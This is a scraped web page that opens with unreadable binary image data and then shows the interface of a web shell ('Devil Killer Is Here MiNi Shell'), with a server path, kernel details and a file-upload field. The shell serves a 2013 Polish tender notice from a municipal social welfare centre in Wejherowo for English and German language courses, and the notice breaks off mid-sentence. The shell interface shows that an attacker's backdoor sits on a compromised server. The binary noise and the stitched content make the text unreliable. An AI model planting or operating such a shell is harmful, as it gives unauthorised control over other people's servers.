JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130725/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130725/294324-N-2013.html

<p class="kh_header"><b>Wejherowo: ZORGANIZOWANIE I PRZEPROWADZENIE GRUPOWEJ NAUKI JĘZYKÓW OBCYCH W RAMACH PROJEKTU Droga do celu</b><br>
<b>Numer ogłoszenia: 294324 - 2013; data zamieszczenia: 25.07.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gminny Ośrodek Pomocy Społecznej , Osiedle Przyjaźni 1b, 84-200 Wejherowo, woj. pomorskie, tel. 58 677 64 30, faks 58 677 64 32.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.gops-wejherowo.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> ZORGANIZOWANIE I PRZEPROWADZENIE GRUPOWEJ NAUKI JĘZYKÓW OBCYCH W RAMACH PROJEKTU Droga do celu.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest przeszkolenie osób w ramach zorganizowanych i przeprowadzonych kursów językowych na rzecz Gminnego Ośrodka Pomocy Społecznej w Wejherowie w ramach projektu systemowego Droga do celu, który jest współfinansowany przez Unię Europejską w ramach Europejskiego Funduszu Społecznego (Program Operacyjny Kapitał Ludzki 2007-2013).</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 80.58.00.00-3, 80.50.00.00-9.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 05.12.2013.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>CZEŚĆ I ZAMÓWIENIA
Zamawiający uzna warunek za spełniony, jeżeli Wykonawca wykaże, że wykonał lub wykonuje w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej dwa zamówienia polegające na zorganizowaniu i przeprowadzeniu szkoleń językowych dla grup liczących co najmniej po 3 osoby dorosłe (przez osobę dorosłą należy rozumieć osobę, która ukończyła 18 lat), każde zawierające minimum 60 godzin zajęć.
CZEŚĆ II ZAMÓWIENIA
Zamawiający uzna warunek za spełniony, jeżeli Wykonawca wykaże, że wykonał lub wykonuje w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej dwa zamówienia polegające na zorganizowaniu i przeprowadzeniu szkoleń językowych dla grup liczących po co najmniej 3 osoby dorosłe (przez osobę dorosłą należy rozumieć osobę, która ukończyła 18 lat), każde zawierające minimum 60 godzin zajęć.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>CZEŚĆ I ZAMÓWIENIA
Wykonawcy winni udokumentować dysponowanie następującymi urządzeniami technicznymi w celu realizacji zamówienia: salą na terenie Miasta Wejherowa dostosowaną do prowadzenia zajęć, tzn.  wyposażoną w sprzęt, tj. tablicę sucho ścieralną i/lub tablicę szkolną i/lub flipchart, projektor multimedialny i ekran do projektora oraz komputer lub laptop, krzesła w ilości odpowiadającej liczbie uczestników szkolenia, stoły i przestrzeń roboczą umożliwiającą swobodne dokonywanie notatek przez uczestników, zaplecze, posiadające odpowiednie warunki sanitarne, bezpieczeństwa, akustyczne i jakościowe, z dostępem do toalety damskiej i męskiej oraz szatni.
CZEŚĆ II ZAMÓWIENIA
Wykonawcy winni udokumentować dysponowanie następującymi urządzeniami technicznymi w celu realizacji zamówienia: salą na terenie Miasta Wejherowa dostosowaną do prowadzenia zajęć, tzn.  wyposażoną w sprzęt, tj. tablicę sucho ścieralną i/lub tablicę szkolną i/lub flipchart, projektor multimedialny i ekran do projektora oraz komputer lub laptop, krzesła w ilości odpowiadającej liczbie uczestników szkolenia, stoły i przestrzeń roboczą umożliwiającą swobodne dokonywanie notatek przez uczestników, zaplecze, posiadające odpowiednie warunki sanitarne, bezpieczeństwa, akustyczne i jakościowe, z dostępem do toalety damskiej i męskiej oraz szatni.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>CZEŚĆ I ZAMÓWIENIA
Wykonawcy winni udokumentować dysponowanie następującymi osobami zdolnymi do wykonania zamówienia: co najmniej jednym lektorem języka angielskiego, który będzie uczestniczyć w wykonywaniu zamówienia i który posiada poniżej wymienione wykształcenie i doświadczenie (łącznie): 
- wykształcenie wyższe magisterskie na kierunku filologii angielskiej lub lingwistyki stosowanej (język angielski) lub absolwent nauczycielskiego kolegium języków obcych w zakresie języka angielskiego,
- minimum roczne doświadczenie w prowadzeniu zajęć językowych w zakresie nauczania języka angielskiego dorosłych (przez osobę dorosłą należy rozumieć osobę, która ukończyła 18 lat).
CZEŚĆ II ZAMÓWIENIA
Wykonawcy winni udokumentować dysponowanie następującymi osobami zdolnymi do wykonania zamówienia: co najmniej jednym lektorem języka niemieckiego, który będzie uczestniczyć w wykonywaniu zamówienia i który posiada poniżej wymienione wykształcenie i doświadczenie (łącznie): 
- wykształcenie wyższe magisterskie na kierunku filologii germańskiej lub lingwistyki stosowanej (język niemiecki) lub absolwent nauczycielskiego kolegium języków obcych w zakresie języka niemieckiego,
- minimum roczne doświadczenie w prowadzeniu zajęć językowych w zakresie nauczania języka niemieckiego dorosłych (przez osobę dorosłą należy rozumieć osobę, która ukończyła 18 lat).</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu wykonania zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Do oferty, w celu stwierdzenia uprawnienia do podpisania oferty, należy załączyć:
1) aktualny odpis z właściwego rejestru (lub zaświadczenie o wpisie do ewidencji działalności gospodarczej), jeżeli odrębne przepisy wymagają wpisu do rejestru wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert lub
aktualny wpis w Centralnej Ewidencji i Informacji o Działalności Gospodarczej;
2) w przypadku podmiotów zagranicznych Wykonawca powinien przedstawić wyciąg z rejestru sądowego, a w przypadku jego braku równoważny dokument wydany przez właściwy organ sądowy lub administracyjny kraju pochodzenia lub kraju, z którego przybywa. W przypadku, gdy dany kraj nie wydaje takich dokumentów lub zaświadczeń, mogą być one zastąpione oświadczeniem złożonym pod przysięgą lub - w Państwach Członkowskich, w których prawo nie przewiduje składania takich oświadczeń - oświadczeniem złożonym przez daną osobę przed właściwym organem sądowym lub administracyjnym, notariuszem albo przed właściwą organizacją zawodową lub gospodarczą kraju pochodzenia lub kraju, z którego ta osoba przybywa;
3) w przypadku gdy formularz ofertowy lub załączone do niego dokumenty są podpisane przez osobę, której umocowanie do reprezentowania Wykonawcy nie wynika z wpisu do właściwego rejestru lub ewidencji działalności gospodarczej lub Centralnej Ewidencji i Informacji o Działalności Gospodarczej, do oferty należy dołączyć odpowiednie pełnomocnictwo w formie oryginału lub poświadczonej notarialnie za zgodność z oryginałem kopii lub poświadczone przez Wykonawcę.
2. Do oferty należy załączyć również program przygotowany dla każdego z kursów opracowany zgodnie z wymogami określonymi w Rozporządzeniu Ministra Pracy i Polityki Społecznej z dnia 14 września 2010r. w sprawie standardów i warunków prowadzenia usług rynku pracy (Dz. U. Nr 177, poz. 1193 z późn. zm.).</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający dopuszcza możliwość zmiany umowy, w szczególności w zakresie: 
1) zmiany harmonogramu realizacji kursu, pod warunkiem, iż zmiana będzie spełniała wymogi określone w Specyfikacji istotnych warunków zamówienia; 
2) zmiany osoby wykonującej powierzoną funkcję, pod warunkiem, że osoba (osoby) wskazana do prowadzenia zajęć, będzie posiadała przygotowanie co najmniej równe osobie dotychczas pełniącej tę funkcję oraz będzie spełniała wymogi określone w Specyfikacji istotnych warunków zamówienia;
3) miejsca przeprowadzenia kursu pod warunkiem, iż miejsce to będzie spełniało wymogi określone w Specyfikacji istotnych warunków zamówienia;
4) zamiany lub wprowadzenia nowych podwykonawców pod warunkiem uzyskania zgody Zamawiającego, na zasadach określonych w Istotnych Warunkach Umowy;
5) zmiany danych Wykonawcy np. zmiana siedziby, adresu, nazwy (bez zmiany samego Wykonawcy).</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.gops-wejherowo.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Gminny Ośrodek Pomocy Społecznej w Wejherowie, 84-200 Wejherowo, Osiedle Przyjaźni 1b, w pok. nr 2.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 05.08.2013 godzina 09:00, miejsce: Gminny Ośrodek Pomocy Społecznej w Wejherowie, 84-200 Wejherowo, Osiedle Przyjaźni 1b, w pok. nr 2.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zamówienie realizowane jest w ramach projektu systemowego Droga do celu realizowanego w ramach PROGRAMU OPERACYJNEGO KAPITAŁ LUDZKI PRIORYTET VII Promocja integracji społecznej DZIAŁANIE 7.1 Rozwój 
i upowszechnianie aktywnej integracji PODDZIAŁANIE 7.1.1 Rozwój i upowszechnianie aktywnej integracji przez ośrodki pomocy społecznej, dofinansowanego ze środków UNII EUROPEJSKIEJ w ramach EUROPEJSKIEGO FUNDUSZU SPOŁECZNEGO.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Przeszkolenie 11 osób skierowanych przez Gminny Ośrodek Pomocy Społecznej w Wejherowie w ramach kursów języka angielskiego.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Celem kursów jest zwiększenie efektywności przebytych przez uczestników kursów zawodowych: gastronomicznego i pracownika administracyjno-biurowego oraz optymalizacja działań zorientowanych na reintegrację społeczno-zawodową beneficjentów ostatecznych projektu Droga do celu. 1. Zajęcia będą odbywały się w dwóch grupach: 1) 3 osobowa - uczestnicy kursu gastronomicznego (dalej: kurs języka angielskiego w gastronomii); 2) 8 osobowa - uczestnicy kursu pracownika administracyjno-biurowego (dalej: kurs języka angielskiego w biurze). 2. Program kursów: 1) języka angielskiego w gastronomii - 60 godzin zajęć - poziom podstawowy, musi zawierać zwroty i słówka stosowane najczęściej w gastronomii; 2) języka angielskiego w biurze - 60 godzin zajęć - poziom podstawowy, musi zawierać zwroty i słówka stosowane najczęściej w pracy administracyjno-biurowej oraz związane z obsługą komputera i oprogramowań. 3. Łączna liczba godzin kursów wynosi - 120. 4. Termin realizacji: od 28 października do 5 grudnia 2013r., z wyłączeniem okresu od 18 do 22 listopada 2013r. 5. Zakup usługi zostanie sfinansowany ze środków dotacji rozwojowej Europejskiego Funduszu Społecznego w ramach Programu Operacyjnego Kapitał Ludzki udzielonej Zamawiającemu na realizację projektu Droga do celu. 6. Szczegółowe wymagania dotyczące przeprowadzenia kursu: 1) Rozpoczęcie kursów zostanie poprzedzone pisemnym przesłaniem przez Zamawiającego listy uczestników kursów; 2) Uczestnicy będą skierowani na poszczególne kursy (osobno na kurs języka angielskiego w gastronomii i na kurs języka angielskiego w biurze) w jednej grupie; 3) Wykonawca zapewni dla potrzeb realizacji przedmiotowych zajęć odpowiednio wykwalifikowany personel tzn. co najmniej jednego lektora języka angielskiego, który będzie uczestniczyć w wykonywaniu zamówienia i który posiada poniżej wymienione wykształcenie i doświadczenie (łącznie): a) wykształcenie wyższe magisterskie na kierunku filologii angielskiej lub lingwistyki stosowanej (język angielski) lub absolwent nauczycielskiego kolegium języków obcych w zakresie języka angielskiego, b) minimum roczne doświadczenie w prowadzeniu zajęć językowych w zakresie nauczania języka angielskiego dorosłych (przez osobę dorosłą należy rozumieć osobę, która ukończyła 18 lat). 4) Wykonawca zapewni dla potrzeb realizacji przedmiotowych zajęć odpowiedni, adekwatny do przedmiotu kursu, potencjał techniczny. Zajęcia zostaną przeprowadzone w pomieszczeniu(-ach) dostosowanym(-ych) do prowadzenia zajęć i odpowiednio w tym celu wyposażonym(-ych) z zapewnionym zapleczem, posiadającym odpowiednie warunki sanitarne, bezpieczeństwa, akustyczne i jakościowe, z dostępem do toalety damskiej i męskiej oraz szatni. Pomieszczenia te są wyposażone co najmniej w krzesła w ilości odpowiadającej liczbie uczestników zajęć, stoły i przestrzeń roboczą umożliwiającą swobodne dokonywanie notatek przez uczestników, tablicę sucho ścieralną i/lub tablicę szkolną i/lub flipchart, projektor multimedialny i ekran do projektora oraz komputer lub laptop; 5) Godzina zajęć liczy 60 minut i obejmuje zajęcia edukacyjne liczące 45 minut oraz przerwę liczącą średnio 15 minut - długość przerw jest ustalana w sposób elastyczny przez Wykonawcę; 6) Zajęcia odbywają się w dni powszednie od poniedziałku do piątku (z wyłączeniem świąt), w przedziale czasowym od 8:00 do 16:00 z zastrzeżeniem, że liczba godzin zajęć w ciągu jednego dnia nie przekroczy trzech (jedna grupa). W uzasadnionych przypadkach, na wniosek uczestników kursu Zamawiający, po wcześniejszym uzgodnieniu tego z Wykonawcą, dopuszcza zorganizowanie kursu w soboty; 7) Kurs powinien mieć opiekuna z ramienia Wykonawcy, czyli osobę odpowiedzialną za organizację kursu, wskazaną do kontaktu z uczestnikami kursu oraz z Zamawiającym; 8) Każdy z uczestników kursu powinien mieć zapewnione samodzielne i odpowiednio (w sposób adekwatny do zakresu kursu) wyposażone stanowisko do nauki; 9) Wykonawca zobowiązany jest zapewnić warunki kursu zgodne z przepisami bezpieczeństwa i higieny pracy, w trakcie jego trwania; 10) W trakcie kursu - Wykonawca powinien zapewnić uczestnikom na własność materiały szkoleniowe (tj. podręczniki lub skrypty zgodne z tematyką kursu, teczki, płyty CD z materiałami ćwiczeniowymi, notesy, długopisy, ołówki, zeszyty itp.). Wymienione powyżej materiały każdy uczestnik kursu otrzyma na własność. Materiały te w przypadku kursów finansowanych z funduszy europejskich muszą być oznakowane. Wszystkie te materiały muszą być przygotowane i rozdane uczestnikom kursu najpóźniej w pierwszym dniu zajęć. Uczestnicy kwitują odbiór materiałów własnoręcznym podpisem. Pokwitowanie Zamawiający otrzyma od Wykonawcy po zakończeniu kursu razem z innymi materiałami niezbędnymi do rozliczenia całej usługi; 11) Kurs winien odbywać się na terenie Miasta Wejherowa, w dobrze skomunikowanym miejscu (w niedalekiej odległości od przystanku autobusowego); 12) Wykonawca zobowiązany jest zapewnić ubezpieczenie od następstw nieszczęśliwych wypadków dla wszystkich uczestników kursu - kopie polisy ubezpieczeniowej Zamawiający otrzyma od Wykonawcy po zakończeniu kursu razem z innymi materiałami niezbędnymi do rozliczenia całej usługi; 13) Kursy zostaną poprzedzone testem opracowanym przez Wykonawcę, który zbada poziom umiejętności każdego uczestnika kursu z zakresu języka angielskiego, (dalej zwany testem pre). Podpisane testy przez każdego uczestnika zajęć oraz opatrzone datą wypełnienia Zamawiający otrzyma od Wykonawcy po zakończeniu kursu razem z innymi materiałami niezbędnymi do rozliczenia całej usługi. Kursy zakończą się identycznym testem (dalej zwanym testem post). Podpisane testy przez każdego uczestnika zajęć oraz opatrzone datą wypełnienia Zamawiający otrzyma od Wykonawcy po zakończeniu kursu razem z innymi materiałami niezbędnymi do rozliczenia całej usługi. 14) Ponadto Wykonawca sporządzi raport z opracowania wyników testów pre i testów post, mierzący stopień dynamiki wiedzy w zakresie programu kursu każdego uczestnika zajęć oraz grupy. Raport Zamawiający otrzyma od Wykonawcy po zakończeniu kursu razem z innymi materiałami niezbędnymi do rozliczenia całej usługi. 15) Po zakończeniu kursu uczestnikom powinny zostać wydane zaświadczenia o ukończeniu kursu, potwierdzające udział w kursie i nabytą wiedzę oraz umiejętności. Ponadto wydane zaświadczenia winny być oznakowane logiem Europejskiego Funduszu Społecznego i informacją, że projekt był współfinansowany ze środków EFS. Kopię zaświadczeń wraz z listą odbioru przez uczestników zaświadczeń Zamawiający otrzyma od Wykonawcy po zakończeniu kursu razem z innymi materiałami niezbędnymi do rozliczenia całej usługi; 16) Kurs zakończy się również opracowaną przez Wykonawcę ankietą oceniającą kurs w następującym zakresie, minimum: jakości materiałów szkoleniowych, przydatności materiałów szkoleniowych, jakości materiałów dydaktycznych, przydatności materiałów dydaktycznych, zastosowanych środków dydaktycznych, warunków lokalowych, organizacji kursu, przygotowania merytorycznego prowadzących kurs, sposobu prowadzenia zajęć. Wypełnione przez każdego uczestnika zajęć ankiety oraz opatrzone datą wypełnienia Zamawiający otrzyma od Wykonawcy po zakończeniu kursu razem z innymi materiałami niezbędnymi do rozliczenia całej usługi; 17) Wykonawca zobowiązany jest do prowadzenia dokumentacji kursu tj. zdjęć zamieszczonych na płycie CD, zrobionych w trakcie zajęć (dokumentacja zdjęciowa musi zostać przekazana Zamawiającemu w formie elektronicznej, na płycie CD lub DVD, a zapisana musi zostać w formacie możliwym do odczytania poprzez ogólnodostępne programy komputerowe); dziennika zajęć zawierającego: program i harmonogram kursu, wskazanie osób prowadzących zajęcia, wymiar godzin i tematy zajęć edukacyjnych; list obecności w każdym dniu zajęć; potwierdzenia odbioru przez uczestnika materiałów szkoleniowych w pierwszym dniu zajęć; polisy ubezpieczeniowej od następstw nieszczęśliwych wypadków wszystkich uczestników zajęć; testów pre; testów post; raportu z opracowania wyników testów; zaświadczeń o ukończeniu kursu; potwierdzenia odbioru przez uczestnika zaświadczeń o ukończeniu kursu oraz ankiety oceniające kurs. Dokumentacja ta winna być sporządzona według zaleceń Zamawiającego, tzn. Wykonawca zobowiązany jest umieszczać informacje o realizowaniu kursu finansowanego z funduszy europejskich na wszystkich dokumentach związanych z jego realizacją oraz w ten sam sposób oznakować miejsce prowadzenia zajęć. Wykonawca zobowiązany jest do przekazania kserokopii w/w dokumentacji, potwierdzonej za zgodność z oryginałem wraz z fakturą / rachunkiem w terminie 7 dni od daty zakończenia realizacji zamówienia; 18) Wykonawca zobowiązany jest do przeniesienia na Zamawiającego autorskich praw majątkowych oraz zależnych praw autorskich do dokumentów, opracowań, zdjęć i wszelkich innych materiałów wytworzonych przez siebie w ramach realizacji niniejszego zamówienia, bez ograniczeń czasowych i terytorialnych, na polach eksploatacji wskazanych w art. 50 ustawy z dnia 4 lutego 1994 roku o prawie autorskim i prawach pokrewnych (tekst 